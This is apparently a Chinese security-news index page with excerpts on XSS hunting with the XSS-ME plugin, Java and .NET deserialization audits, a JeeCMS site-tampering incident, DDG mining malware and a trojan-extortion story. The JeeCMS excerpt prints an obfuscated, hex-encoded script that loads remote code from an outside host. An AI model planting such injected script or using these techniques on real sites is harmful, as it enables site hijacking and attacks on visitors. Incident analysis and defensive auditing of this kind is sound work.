安全脉搏

高质量的全球互联网安全媒体和技术平台,安全技术爱好者最佳的交流社区。

3316人订阅
Xss漏洞挖掘新姿势,XSS ME的“小秘密”  说到xss漏洞挖掘,我们可以看到网上是这个样子的。   我们会看到有各种xss的文章方便大家了解相关的知识,以及搭建一些平台进行学习。而我最近在挖洞的时候,掌握了一种新的“姿势”,发现火狐浏览器的一款插件很好用,没错就是XSS-ME。 说是“神器”,有一点过,但他能快速高效的找出页面可能存在的xss漏洞。熟练使用可以非常节省时间。但是,我在搜索的时候发现相关内容很少,内容与xss-me真正有关的更少。许多资料都是“为水而水”,所以想和大家分享一下我的经验。 我这里用的是个老版本的xss me,但功能齐全依旧很好用。 进入正题,找到目标页面,鼠标右键,我们会看到(提前安装好)这个插件XSS ME Sidebar,XSS-Me常用来发现反射型的XSS...
安全小课堂第136期【 浅谈Java原生反序列化漏洞】 讲师介绍 Venscor,京东安全工程师,擅长Java代码审计,安全分析与加固,移动安全 背景介绍 Java 序列化是指把 Java 对象转换为字节序列,便于保存在内存、文件、数据库中,而Java 反序列化是指把字节序列恢复为 Java 对象的过程。java的反序列化漏洞波及范围广,危害大,可以执行命令,甚至直接getshell。 课堂内容 京安小妹:什么是Java的序列化和反序列化,以及为什么需要序列化/反序列化? Venscor:从广义角度,Java的序列化与反序列化是一种编码机制。反序列化就是将Java中的对象按照一定的编码协议编码成字符串的过程。相反,序列化就可以理解成将字符串解码成Java对...
.NET高级代码审计(第九课) BinaryFormatter反序列化漏洞 0x00 前言 BinaryFormatter和SoapFormatter两个类之间的区别在于数据流的格式不同,其他的功能上两者差不多,BinaryFormatter位于命名空间 System.Runtime.Serialization.Formatters.Binary它是直接用二进制方式把对象进行序列化,优点是速度较快,在不同版本的.NET平台里都可以兼容。但是使用反序列化不受信任的二进制文件会导致反序列化漏洞从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍和复现。 0x01 BinaryFormatter序列化 使用BinaryFormatter类序列化的过程中,用[Serializable]声明这个类是可以被序列化的,当然有些不想被序列化的元素可以用[NoSerialized]属性来规避。下面通过一个实例来说明问题,首先定义TestCla...
华强北有家手机店,不仅往女生手机里装木马,还TM勒索别人10万 大家好,我是凌云。 我见过很多奇奇怪怪的人,特别是做黑色产业的,但他们仅仅专注一件事,而这次遇到的这人,副业真TM多——帮小偷解锁脏机,勒索要挟,给女生修手机还装木马监控,搞黄色网站。 这事有很多牵连,我不想给别人联想到我,所以这件事我会修改隐去某些细节,以及事件时间是我编的。 案件起因:裸照勒索案 调查时间:2019年4月3号 结束时间:2019年4月10号 2019年4月3号,我的金主大熊给我打了一电话,他说有件事想找我帮忙调查,让我出来见面聊。 大熊是开侦探所的,他搞不定的案件会甩手给我做,也是教我实地调查的一位师傅。 我想了想,和他约定好时间地点后,打车到老地方附近的街上瞎逛了一会,然后找了家店随便吃...
【活动招募】4.20 勇士邀请函——和Ta在枪林弹雨中升华“革命友谊”
登录注册攻与防  1 关于登录注册  登录注册,是绝大多数互联网应用中的一项必备功能,作为开发者的我们,基本都对该功能非常熟悉。通常新手在进行编程练习时,会做大量与此相关的开发工作。我们往往对基础功能了如指掌,却忽略了登录注册功能可能遭受的其他风险。作者在多年的安全测试及研发工作中发现,不同场景下,大多数应用的登录注册功能,或多或少存在一些问题,该功能作为系统的主要入口,将严重影响到整个系统的安全性。 如果我们的系统,在面对的非常庞大的用户群体,并且伴随着某一方的利益时,登录注册功能应该设计的更加严谨。目前,大多数的“薅羊毛”团队,都是通过机器注册大量用户,以操纵这些虚假用户进行获利。 在此背景下,我们的登录系统...
JeeCMS漏洞竟沦为黑产SEO的秘密武器? 背景概述 近日深信服安全感知平台发现客户服务器中的文件被篡改,植入赌博页面。经深信服安全团队排查,发现大量网页文件被篡改,且被篡改的时间非常密集,如下图所示在2019年3月26日 16:46左右网站目录下产生大量恶意文件。   入侵分析 排查篡改目录下最早被篡改的文件,创建时间为2019年3月14日13:53。   排查被篡改的网站文件,均在头部位置发现了恶意代码,如下图所示:   恶意代码内容如下: <script>var _0x150a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x61\x70\x69\x38\x38\x38\x2E\x63\x6F\x6D\x2F\x67\x6C\x6F\x62\x61\x6C\x2F\x73\x74\x61\x74\x69\x63\x2F\x6A\x73\x2F\x74\...
.NET高级代码审计(第八课)SoapFormatter反序列化漏洞 0x00 前言 SoapFormatter格式化器和下节课介绍的BinaryFormatter格式化器都是.NET内部实现的序列化功能的类,SoapFormatter直接派生自System.Object,位于命名空间System.Runtime.Serialization.Formatters.Soap,并实现IRemotingFormatter、IFormatter接口,用于将对象图持久化为一个SOAP流,SOAP是基于XML的简易协议,让应用程序在HTTP上进行信息交换用的。但在某些场景下处理了不安全的SOAP流会造成反序列化漏洞从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍和复现。 0x01 SoapFormatter序列化 SoapFormatter类实现的IFormatter接口中定义了核心的Serialize方法可以非常方便的实现.NET对象与SOAP流之间的转换,可以将数据...
linux挖矿病毒DDG改造后重出江湖蔓延Windows平台 背景概述 近日,深信服安全团队捕获一枚Linux、windows双平台的挖矿病毒样本,通过安全人员分析确认,该木马是通过redis漏洞传播的挖矿木马DDG的最新变种,使用当前最新的go语言1.10编译使用了大量的基础库文件,该木马会大量消耗服务器资源,难以清除并具有内网扩散功能。 DDG挖矿病毒是一款在Linux系统下运行的恶意挖矿病毒,该病毒从去年一直活跃在现在,已经挖取了价值一千多万人民币的虚拟币货币,此病毒样本在一年左右的时间,已开发出了DDG.3012/DDG3013/DDG3020多个变种版本。 主要功能如下: 文件名 作用 networkservice 横向移动模块,包含mssql redis thinkphp weblogic等漏洞探测模块 sysguard 根据获取到的系统版...
.NET高级代码审计(第七课) NetDataContractSerializer反序列化漏洞 0x00 前言 NetDataContractSerializer和DataContractSerializer一样用于序列化和反序列化Windows Communication Foundation (WCF) 消息中发送的数据。两者 之间存在一个重要区别:NetDataContractSerializer 包含了CLR,通过CLR类型添加额外信息并保存引用来支持类型精确,而 DataContractSerializer 则不包含。 因此,只有在序列化和反序列化端使用相同的 CLR 类型时,才能使用 NetDataContractSerializer。若要序列化对象使用 WriteObject或者Serialize方法, 若要反序列化 XML流使用 ReadObject或者Deserialize方法。在某些场景下读取了恶意的XML流就会造成反序列化漏洞,从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍...